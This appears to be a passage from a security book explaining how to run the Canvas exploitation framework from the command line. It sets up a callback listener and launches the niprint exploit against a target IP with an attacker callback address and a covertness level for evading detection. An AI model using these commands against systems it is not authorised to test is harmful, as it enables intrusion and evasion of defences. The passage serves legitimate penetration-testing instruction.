A GUI can be convenient, but running from a command line often allows more flexibility and can make it easier to carry out tasks remotely. To use the command line, perform the following steps:
Set up the exploit callback listener. From the Canvas directory, use the command:
python commandlineInterface.py -p[CALLBACK PORT] -v[TARGET OS]
The -v option currently supports:
0 LINUXEXECVE
1 WIN32MOSDEF
2 LINUXMOSDEF
3 SOLARISMOSDEF
4 BSDMOSDEF
5 OSXMOSDEF
6 AIXMOSDEF
7 PHPMULTI
Launch the exploit directly by calling the exploit module in Python; for example, calling the niprint exploit would look like:
python ./exploits/niprint/niprint.py -v[OS TARGET VERSION] -t[TARGET IP] -p[TARGET PORT] -l[ATTACKER IP] -d[CALLBACK PORT] -T[TESTING MODE] -C[COVERTNESS LEVEL]
The options are listed in Table 9-3.
Table 9-3. Exploit options and their descriptions
Option | Description |
---|---|
-v | The supported OS version; depends on the exploit. |
-t | Target IP address. |
-p | Target TCP/UDP port. |
-l | Attacker IP reachable from the target. |
-d | The callback port (the one given to commandlineInterface.py). |
-T | Test the exploit, but do not run it. |
-C | Covertness level; the range is from 1 to 11, where 1 is no evasion and 11 is full evasion. |
Evasion can impact an exploit's reliability, so using more evasion is not always the correct solution. A compromise between evasion and reliability must be found for each target. The covertness level feature is mostly implemented in the transport layer using fragmentation or encoding.